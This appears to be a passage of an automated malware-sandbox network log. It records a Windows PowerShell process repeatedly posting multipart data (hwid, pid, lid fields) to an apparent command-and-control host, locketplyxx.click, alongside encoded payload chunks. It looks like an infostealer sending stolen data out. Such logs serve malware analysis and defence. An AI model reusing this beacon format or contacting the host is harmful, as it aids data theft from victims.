                                                                                                                                            2024-12-21 19:15:31 UTC1369INData Raw: 6e 32 6a 49 53 66 33 6c 68 32 34 41 58 2b 56 51 37 73 49 69 52 78 59 36 6c 49 6e 30 36 37 37 61 5a 55 45 52 78 57 55 78 79 64 57 63 71 73 68 61 4c 37 58 47 72 4a 4f 4a 39 59 59 67 51 2b 53 41 6b 4c 6f 54 43 75 55 75 62 78 33 32 67 52 44 55 38 4f 45 62 78 51 38 71 54 6f 6e 34 5a 59 36 73 45 49 6b 77 52 32 59 53 34 64 44 56 4b 64 46 4c 64 50 70 39 58 62 62 41 6b 5a 56 33 6f 38 6b 55 58 6d 38 4b 57 36 30 32 78 71 74 53 79 6a 57 45 49 34 42 6b 67 4a 48 34 30 38 73 6c 62 47 31 4d 4a 74 44 54 45 32 4d 33 32 39 35 65 62 34 6c 61 36 2b 55 49 4f 42 65 61 63 78 51 6a 67 66 59 56 51 33 76 52 79 4b 51 75 72 70 7a 33 51 68 5a 56 64 36 42 49 6c 39 75 71 43 64 70 73 39 55 49 71 6b 38 68 31 68 6d 43 41 70 30 4b 53 61 63 4d 59 5a 53 70 39 53 69 56 49 6b 5a 65 77 49 30 34
                                                                                                                                            Data Ascii: n2jISf3lh24AX+VQ7sIiRxY6lIn0677aZUERxWUxydWcqshaL7XGrJOJ9YYgQ+SAkLoTCuUubx32gRDU8OEbxQ8qTon4ZY6sEIkwR2YS4dDVKdFLdPp9XbbAkZV3o8kUXm8KW602xqtSyjWEI4BkgJH408slbG1MJtDTE2M3295eb4la6+UIOBeacxQjgfYVQ3vRyKQurpz3QhZVd6BIl9uqCdps9UIqk8h1hmCAp0KSacMYZSp9SiVIkZewI04
                                                                                                                                            2024-12-21 19:15:31 UTC1369INData Raw: 42 31 75 64 6f 49 72 45 73 68 32 68 32 46 53 39 5a 4e 53 76 38 43 65 64 4f 62 74 6d 54 57 43 51 6c 67 7a 34 6b 68 58 57 72 75 50 53 6d 67 6c 68 32 73 41 58 2b 56 48 59 67 44 6e 68 39 43 36 6b 45 76 6e 62 36 77 66 39 30 44 53 31 6a 4a 67 79 52 52 66 36 4d 6d 64 62 50 57 45 71 56 41 4c 64 39 51 78 30 75 66 46 51 32 2f 41 68 43 45 75 76 64 46 31 67 31 46 55 74 72 48 4d 42 52 6c 37 69 56 72 2b 59 35 61 72 55 6b 69 30 42 2b 49 41 5a 59 49 52 2b 74 4b 4c 35 43 6a 75 6e 54 56 44 30 4e 66 77 59 6b 72 55 6e 57 6c 4b 57 47 35 31 78 44 67 44 32 66 53 43 4d 6c 54 32 44 6c 4b 36 30 38 75 30 59 53 32 66 74 73 45 58 52 58 54 79 54 59 61 65 36 4a 69 50 2f 6e 61 45 36 42 4b 4c 64 45 51 6a 67 61 64 44 6b 72 6b 54 79 61 5a 76 37 4a 30 32 51 70 47 55 38 79 41 4b 31 39 75 71
                                                                                                                                            Data Ascii: B1udoIrEsh2h2FS9ZNSv8CedObtmTWCQlgz4khXWruPSmglh2sAX+VHYgDnh9C6kEvnb6wf90DS1jJgyRRf6MmdbPWEqVALd9Qx0ufFQ2/AhCEuvdF1g1FUtrHMBRl7iVr+Y5arUki0B+IAZYIR+tKL5CjunTVD0NfwYkrUnWlKWG51xDgD2fSCMlT2DlK608u0YS2ftsEXRXTyTYae6JiP/naE6BKLdEQjgadDkrkTyaZv7J02QpGU8yAK19uq
                                                                                                                                            2024-12-21 19:15:31 UTC1369INData Raw: 64 4c 36 35 58 5a 38 70 65 6b 45 75 66 41 51 32 2f 41 69 69 61 6f 37 74 2b 33 41 35 4e 58 63 75 4a 49 6c 46 36 70 53 56 67 76 39 73 53 72 55 51 6b 31 42 53 44 47 5a 73 47 52 2b 70 49 59 64 33 78 73 6d 69 56 57 77 74 79 77 4b 34 2f 51 57 36 34 59 6e 6a 33 7a 31 71 6e 54 57 65 4e 55 49 6f 45 6b 51 4a 46 37 30 30 75 6c 37 2b 7a 64 74 67 47 52 46 2f 65 6a 79 46 58 64 36 45 70 64 62 6e 62 48 71 78 46 4c 39 34 61 79 55 58 59 43 6c 57 6e 47 6d 47 6d 76 4c 70 77 31 68 55 4c 53 6f 4b 65 62 31 31 77 37 6e 6f 6e 74 64 67 61 72 30 30 72 33 68 69 49 42 35 59 4b 53 4f 35 4b 4b 59 47 77 73 58 6a 55 44 55 52 55 79 49 49 71 58 6e 75 71 4a 47 6a 35 6d 46 71 6e 57 57 65 4e 55 4b 59 73 72 55 39 73 33 51 49 2b 33 61 6a 31 64 39 6c 44 45 78 58 41 68 43 4e 53 63 36 67 72 61 37
                                                                                                                                            Data Ascii: dL65XZ8pekEufAQ2/Aiiao7t+3A5NXcuJIlF6pSVgv9sSrUQk1BSDGZsGR+pIYd3xsmiVWwtywK4/QW64Ynj3z1qnTWeNUIoEkQJF700ul7+zdtgGRF/ejyFXd6EpdbnbHqxFL94ayUXYClWnGmGmvLpw1hULSoKeb11w7nontdgar00r3hiIB5YKSO5KKYGwsXjUDURUyIIqXnuqJGj5mFqnWWeNUKYsrU9s3QI+3aj1d9lDExXAhCNSc6gra7
                                                                                                                                            2024-12-21 19:15:31 UTC1369INData Raw: 53 79 7a 52 45 34 30 4f 6c 77 78 4d 34 56 41 6d 6d 71 4f 37 66 64 6f 4c 51 31 7a 4e 67 79 70 58 65 71 49 6f 5a 72 37 59 46 4b 67 42 61 5a 55 58 6b 55 76 41 54 57 7a 33 57 54 4f 46 76 4a 52 39 32 6b 4e 55 47 39 58 48 4b 46 59 38 39 6d 4a 75 71 39 49 58 73 6b 67 67 32 78 2b 4b 47 5a 6b 41 52 76 56 46 4c 70 65 32 75 58 62 61 42 55 70 51 78 6f 73 6f 58 33 65 68 4c 69 66 33 6c 68 32 34 41 58 2b 56 50 6f 49 59 6a 77 35 44 37 46 51 36 30 36 37 37 61 5a 55 45 52 78 57 55 78 79 78 52 64 36 6f 69 61 37 6e 53 46 36 42 54 4b 4e 49 58 67 41 43 4b 42 30 72 67 53 53 6d 59 76 72 4e 69 32 51 31 5a 55 4e 36 56 62 78 51 38 71 54 6f 6e 34 5a 59 73 70 31 45 33 31 6c 4b 34 48 5a 73 62 52 75 70 4f 59 59 7a 2f 72 44 44 53 44 77 73 4e 6a 49 45 67 55 33 2b 68 49 32 36 31 32 78 2b
                                                                                                                                            Data Ascii: SyzRE40OlwxM4VAmmqO7fdoLQ1zNgypXeqIoZr7YFKgBaZUXkUvATWz3WTOFvJR92kNUG9XHKFY89mJuq9IXskgg2x+KGZkARvVFLpe2uXbaBUpQxosoX3ehLif3lh24AX+VPoIYjw5D7FQ60677aZUERxWUxyxRd6oia7nSF6BTKNIXgACKB0rgSSmYvrNi2Q1ZUN6VbxQ8qTon4ZYsp1E31lK4HZsbRupOYYz/rDDSDwsNjIEgU3+hI2612x+
                                                                                                                                            2024-12-21 19:15:31 UTC1369INData Raw: 53 69 43 42 61 6f 4f 56 71 64 64 62 34 72 78 73 6e 79 56 57 77 74 57 79 34 51 75 55 48 57 69 4c 57 43 39 78 42 43 6e 55 79 62 55 47 34 51 48 6d 41 42 41 37 55 4d 6f 6e 72 32 34 64 39 49 4d 54 68 57 43 78 79 68 43 50 50 5a 69 52 72 54 64 46 76 73 62 5a 38 70 65 6b 45 75 66 41 51 32 2f 41 69 47 5a 74 4c 39 39 31 67 78 49 52 38 32 42 50 56 70 78 70 44 42 74 73 74 4d 58 72 55 77 6b 30 78 61 43 42 34 6f 45 54 65 52 4a 59 64 33 78 73 6d 69 56 57 77 74 32 32 35 45 6c 58 58 43 34 4b 57 61 36 77 42 65 77 41 57 6d 56 41 59 34 61 32 46 56 62 39 31 55 6d 6a 50 2b 73 4d 4e 49 50 43 77 32 4d 67 53 5a 63 65 36 67 73 64 62 7a 51 46 61 39 49 4c 74 45 59 69 67 75 63 43 55 72 69 51 53 32 59 74 72 5a 2f 30 51 70 46 58 4d 50 48 59 52 70 37 74 6d 49 2f 2b 66 63 42 6f 30 30 71
                                                                                                                                            Data Ascii: SiCBaoOVqddb4rxsnyVWwtWy4QuUHWiLWC9xBCnUybUG4QHmABA7UMonr24d9IMThWCxyhCPPZiRrTdFvsbZ8pekEufAQ2/AiGZtL991gxIR82BPVpxpDBtstMXrUwk0xaCB4oETeRJYd3xsmiVWwt225ElXXC4KWa6wBewAWmVAY4a2FVb91UmjP+sMNIPCw2MgSZce6gsdbzQFa9ILtEYigucCUriQS2YtrZ/0QpFXMPHYRp7tmI/+fcBo00q
                                                                                                                                            2024-12-21 19:15:31 UTC288INData Raw: 69 52 54 51 4f 6e 52 54 6e 54 36 66 56 51 33 68 56 4f 55 74 72 46 47 6c 6c 79 6f 43 56 78 2b 63 6b 6c 37 67 45 6d 6c 55 69 77 45 74 67 62 44 62 38 51 62 39 4f 6a 39 53 69 56 52 45 68 48 33 6f 45 73 54 48 2f 70 48 46 6d 65 77 42 43 6e 55 53 44 43 48 38 6c 46 32 41 49 4e 76 33 74 68 6d 72 61 75 59 63 4d 4f 57 31 4b 4d 75 47 45 61 5a 4f 35 36 4a 34 7a 56 46 4b 35 47 4d 63 52 64 72 68 32 53 43 6c 33 67 56 53 37 54 2f 2f 56 32 6c 56 73 59 47 34 79 44 50 68 6f 6b 2f 6e 41 38 37 49 56 4e 38 42 4d 34 6d 77 6e 4a 48 64 68 56 48 36 6b 43 4d 39 50 70 39 54 66 57 45 56 6c 54 7a 35 45 73 48 55 4b 51 42 58 32 30 30 41 32 78 66 78 6e 53 43 6f 51 4e 6a 78 77 42 38 6b 45 76 6e 62 61 6a 4d 4a 74 44 52 42 57 55 76 6d 38 53 50 4a 46 73 4a 36 47 57 51 75 42 30 4a 4e 73 65 6a
                                                                                                                                            Data Ascii: iRTQOnRTnT6fVQ3hVOUtrFGllyoCVx+ckl7gEmlUiwEtgbDb8Qb9Oj9SiVREhH3oEsTH/pHFmewBCnUSDCH8lF2AINv3thmrauYcMOW1KMuGEaZO56J4zVFK5GMcRdrh2SCl3gVS7T//V2lVsYG4yDPhok/nA87IVN8BM4mwnJHdhVH6kCM9Pp9TfWEVlTz5EsHUKQBX200A2xfxnSCoQNjxwB8kEvnbajMJtDRBWUvm8SPJFsJ6GWQuB0JNsej
                                                                                                                                            2024-12-21 19:15:31 UTC1369INData Raw: 33 31 65 30 0d 0a 36 34 31 50 38 78 5a 33 68 77 2f 48 45 74 67 62 44 62 38 51 62 39 4f 6a 39 53 69 56 52 45 68 48 33 6f 45 73 54 48 2f 70 48 46 6d 58 30 52 79 6c 52 6a 65 58 50 6f 49 66 6e 30 30 44 70 30 31 68 79 34 6a 31 4f 4a 55 38 42 52 58 55 78 33 63 61 53 61 30 73 61 62 37 41 43 2b 31 76 49 4e 4d 56 6a 68 76 61 49 30 62 7a 52 57 48 64 38 62 4d 77 6a 56 4d 46 46 63 69 57 62 77 49 73 2f 48 6b 79 36 6f 46 4b 38 6c 35 70 7a 46 43 66 53 38 42 66 41 36 64 51 59 63 76 78 38 6e 50 48 45 55 31 57 32 6f 52 6f 5a 45 4b 74 4e 47 71 32 33 52 75 65 66 77 6e 59 45 59 6f 46 32 6a 78 62 36 6c 49 69 6c 72 61 4c 54 74 73 45 58 31 4c 43 67 53 38 61 4d 75 34 74 4a 2b 48 76 57 75 67 42 47 4a 74 51 6b 55 76 41 54 58 6a 6b 54 43 2b 55 70 36 51 39 39 68 56 47 57 73 65 47 62
                                                                                                                                            Data Ascii: 31e0641P8xZ3hw/HEtgbDb8Qb9Oj9SiVREhH3oEsTH/pHFmX0RylRjeXPoIfn00Dp01hy4j1OJU8BRXUx3caSa0sab7AC+1vINMVjhvaI0bzRWHd8bMwjVMFFciWbwIs/Hky6oFK8l5pzFCfS8BfA6dQYcvx8nPHEU1W2oRoZEKtNGq23RuefwnYEYoF2jxb6lIilraLTtsEX1LCgS8aMu4tJ+HvWugBGJtQkUvATXjkTC+Up6Q99hVGWseGb
                                                                                                                                            2024-12-21 19:15:31 UTC1369INData Raw: 6c 5a 4b 76 45 48 4b 4e 58 4a 4a 49 75 74 79 79 57 43 6b 7a 78 55 69 79 66 6b 4c 5a 68 33 7a 31 31 51 4d 2b 4a 49 56 31 71 76 32 49 70 2b 64 6c 61 2b 48 68 6e 6e 56 43 32 52 64 67 56 44 62 38 43 46 4a 43 2f 75 33 66 44 45 67 5a 79 77 6f 41 75 54 47 79 6a 4c 6b 61 36 78 78 44 67 44 32 66 54 55 4e 46 5a 31 6b 31 4a 39 67 4a 35 77 2b 50 75 4a 59 5a 55 47 77 66 54 79 54 59 61 61 75 35 36 4e 66 65 57 43 4f 41 5a 5a 35 49 54 6d 78 6d 65 44 6c 76 6b 42 52 2b 74 6c 4b 4a 7a 78 51 56 49 61 2f 4b 73 49 31 78 37 74 43 56 68 6e 2f 5a 61 37 67 45 6f 6c 55 69 77 53 39 42 4e 63 71 6b 43 4f 64 50 70 39 55 58 57 44 55 56 53 32 70 5a 69 66 32 75 74 4d 6d 47 36 6c 6c 54 67 52 32 65 4e 51 4d 64 4c 6e 42 77 4e 76 78 4a 7a 79 4f 54 6d 4a 34 56 52 56 42 76 56 78 7a 6b 61 4a 50
                                                                                                                                            Data Ascii: lZKvEHKNXJJIutyyWCkzxUiyfkLZh3z11QM+JIV1qv2Ip+dla+HhnnVC2RdgVDb8CFJC/u3fDEgZywoAuTGyjLka6xxDgD2fTUNFZ1k1J9gJ5w+PuJYZUGwfTyTYaau56NfeWCOAZZ5ITmxmeDlvkBR+tlKJzxQVIa/KsI1x7tCVhn/Za7gEolUiwS9BNcqkCOdPp9UXWDUVS2pZif2utMmG6llTgR2eNQMdLnBwNvxJzyOTmJ4VRVBvVxzkaJP


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                            5192.168.2.449822172.67.151.1934437704C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:15:33 UTC274OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=A68GT5UND
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 18110
                                                                                                                                            Host: locketplyxx.click
                                                                                                                                            2024-12-21 19:15:33 UTC15331OUTData Raw: 2d 2d 41 36 38 47 54 35 55 4e 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 33 45 41 32 39 41 34 36 42 39 34 37 39 38 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 41 36 38 47 54 35 55 4e 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 41 36 38 47 54 35 55 4e 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 41 36 38 47 54 35 55 4e 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73
                                                                                                                                            Data Ascii: --A68GT5UNDContent-Disposition: form-data; name="hwid"833EA29A46B9479837CB803551D62973--A68GT5UNDContent-Disposition: form-data; name="pid"2--A68GT5UNDContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--A68GT5UNDContent-Dis
                                                                                                                                            2024-12-21 19:15:33 UTC2779OUTData Raw: 07 cf 5c b7 ad 66 f0 cc 99 a8 33 f7 13 05 cf ec 85 7a 3b 85 8d 54 32 2f 1f e5 1b c1 33 7b 37 a5 bf 9f 8e 3a f1 6e 9a e0 79 69 60 c1 4c a6 f2 f7 de 4b 1f 36 af 1d f9 d7 e0 58 6d 5b 0b fd 9c 0a b5 9b 60 cc b0 d7 ab 1f 3b d0 52 0a 9f fd 54 22 95 3f 7a 94 ff 75 ab 9f a1 e3 6f 93 83 99 38 43 4e 2f 95 2f 6d 6e ac ae d3 03 1e ad ac 6f 7a a3 8a 81 36 d9 bf 1f 83 71 fd 1a ed c5 4d d3 3e 9b d8 ac 97 0c bd 15 36 2b 97 37 bb ef 2e 57 0f bc 3e 57 2a 0f 97 2f ad 6d 4a a7 02 2f 2b 7f 42 10 78 3e ba 45 a8 b5 6d 75 bf 83 75 53 b3 09 3b 9c 3e 27 56 d3 d4 ab d6 33 5e 4f 4d 1f 4e cd b2 89 b4 bc b1 b1 56 29 af ef 1e fa 70 79 ed 62 65 cf 7b d9 de 73 45 81 36 af a9 da 16 51 bc 21 8f 77 45 11 8f 43 d4 61 11 d5 14 88 8d cc 54 77 94 6d 93 be 93 15 d7 52 9c ab a6 b6 5f c9 35 8b 56
                                                                                                                                            Data Ascii: \f3z;T2/3{7:nyi`LK6Xm[`;RT"?zuo8CN//mnoz6qM>6+7.W>W*/mJ/+Bx>EmuuS;>'V3^OMNV)pybe{sE6Q!wECaTwmR_5V
                                                                                                                                            2024-12-21 19:15:34 UTC1134INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:15:34 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=df5ctubjdnq6sqqvhc20i4hjj1; expires=Wed, 16 Apr 2025 13:02:12 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=IaGYWMxKdvGZFcaHg9EktfZQT8bf%2BgeGxXw2pRiVqkwwa6HH2E%2BPRDHHKHt5rGSuKfplLJ7GZ%2B78rYG5XiOfxrKcW3jo0mGiqaZ8qczFD2sNWwvORT68jixdUzz7DvctBS8ddQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a33955c604308-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=2145&min_rtt=1700&rtt_var=1528&sent=10&recv=23&lost=0&retrans=0&sent_bytes=2843&recv_bytes=19064&delivery_rate=554605&cwnd=228&unsent_bytes=0&cid=2f880c37062a2700&ts=1041&x=0"
                                                                                                                                            2024-12-21 19:15:34 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-21 19:15:34 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            6192.168.2.449823172.67.151.193443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:15:35 UTC280OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=VNXJOJS592EHRELI
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 8773
                                                                                                                                            Host: locketplyxx.click
                                                                                                                                            2024-12-21 19:15:35 UTC8773OUTData Raw: 2d 2d 56 4e 58 4a 4f 4a 53 35 39 32 45 48 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 33 45 41 32 39 41 34 36 42 39 34 37 39 38 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 56 4e 58 4a 4f 4a 53 35 39 32 45 48 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 56 4e 58 4a 4f 4a 53 35 39 32 45 48 52 45 4c 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 56
                                                                                                                                            Data Ascii: --VNXJOJS592EHRELIContent-Disposition: form-data; name="hwid"833EA29A46B9479837CB803551D62973--VNXJOJS592EHRELIContent-Disposition: form-data; name="pid"2--VNXJOJS592EHRELIContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--V
                                                                                                                                            2024-12-21 19:15:36 UTC1134INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:15:36 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=6mj9o97q5ocujmb055lrrmvpce; expires=Wed, 16 Apr 2025 13:02:14 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iq2SJY4P0IXYxn7CWGHy%2F13qngNZD0zuXLliJ094TF8pZ0hoz%2B5I2zPpfZ3s0I2DYLtHh%2BLyoiWCUQOF1sM2G%2BsiNzcbkaPEXdBGiqWiN0suvKHobVxCCd2yY3ie5yLrP%2Bqxkg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a33a38ce84286-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1616&min_rtt=1608&rtt_var=619&sent=8&recv=14&lost=0&retrans=0&sent_bytes=2843&recv_bytes=9711&delivery_rate=1745367&cwnd=32&unsent_bytes=0&cid=d6030992e16bf9fa&ts=917&x=0"
                                                                                                                                            2024-12-21 19:15:36 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-21 19:15:36 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            7192.168.2.449824172.67.151.193443
                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                            2024-12-21 19:15:37 UTC278OUTPOST /api HTTP/1.1
                                                                                                                                            Connection: Keep-Alive
                                                                                                                                            Content-Type: multipart/form-data; boundary=BWQXN3MR8YL0T
                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                                                            Content-Length: 20408
                                                                                                                                            Host: locketplyxx.click
                                                                                                                                            2024-12-21 19:15:37 UTC15331OUTData Raw: 2d 2d 42 57 51 58 4e 33 4d 52 38 59 4c 30 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 38 33 33 45 41 32 39 41 34 36 42 39 34 37 39 38 33 37 43 42 38 30 33 35 35 31 44 36 32 39 37 33 0d 0a 2d 2d 42 57 51 58 4e 33 4d 52 38 59 4c 30 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 42 57 51 58 4e 33 4d 52 38 59 4c 30 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 6a 4d 77 31 49 45 2d 2d 53 48 45 4c 4c 53 0d 0a 2d 2d 42 57 51 58 4e 33 4d 52 38 59
                                                                                                                                            Data Ascii: --BWQXN3MR8YL0TContent-Disposition: form-data; name="hwid"833EA29A46B9479837CB803551D62973--BWQXN3MR8YL0TContent-Disposition: form-data; name="pid"3--BWQXN3MR8YL0TContent-Disposition: form-data; name="lid"jMw1IE--SHELLS--BWQXN3MR8Y
                                                                                                                                            2024-12-21 19:15:37 UTC5077OUTData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 72 83 51 b0 b0 e9 a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 4d 6e 20 0a 16 36 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 c9 0d 46 c1 c2 a6 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 36 b9 81 28 58 d8 f4 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 26 37 18 05 0b 9b 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e4 06 a2 60 61 d3 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                            Data Ascii: lrQMn 64F6(X&7~`aO
                                                                                                                                            2024-12-21 19:15:38 UTC1133INHTTP/1.1 200 OK
                                                                                                                                            Date: Sat, 21 Dec 2024 19:15:38 GMT
                                                                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                                                                            Transfer-Encoding: chunked
                                                                                                                                            Connection: close
                                                                                                                                            Set-Cookie: PHPSESSID=dln3d7t6ebbjhp222q8u804qdi; expires=Wed, 16 Apr 2025 13:02:17 GMT; Max-Age=9999999; path=/
                                                                                                                                            Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                            Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                            Pragma: no-cache
                                                                                                                                            X-Frame-Options: DENY
                                                                                                                                            X-Content-Type-Options: nosniff
                                                                                                                                            X-XSS-Protection: 1; mode=block
                                                                                                                                            cf-cache-status: DYNAMIC
                                                                                                                                            vary: accept-encoding
                                                                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p3lkIz4pkwM9xLpTMWKmNWN2I%2ByixP88OuQ7FJ4Hdf%2FMhDacwCz63sNjf88LhNBCQReyNiWmeZeQE12VSnP3GSrzTAdTGXaJ7Ohi8dVetZjT5BJ%2BZqL778OLT371Fc7cD1WhIQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                            Server: cloudflare
                                                                                                                                            CF-RAY: 8f5a33b13f0243a1-EWR
                                                                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1666&rtt_var=665&sent=13&recv=25&lost=0&retrans=0&sent_bytes=2841&recv_bytes=21366&delivery_rate=1596500&cwnd=233&unsent_bytes=0&cid=b87784da13335982&ts=947&x=0"
                                                                                                                                            2024-12-21 19:15:38 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                                                            Data Ascii: fok 8.46.123.189
                                                                                                                                            2024-12-21 19:15:38 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                            Data Ascii: 0


                                                                                                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                            8192.168.2.449825172.67.151.193443
                                                                                                                                            TimestampBytes transferredDirectionData
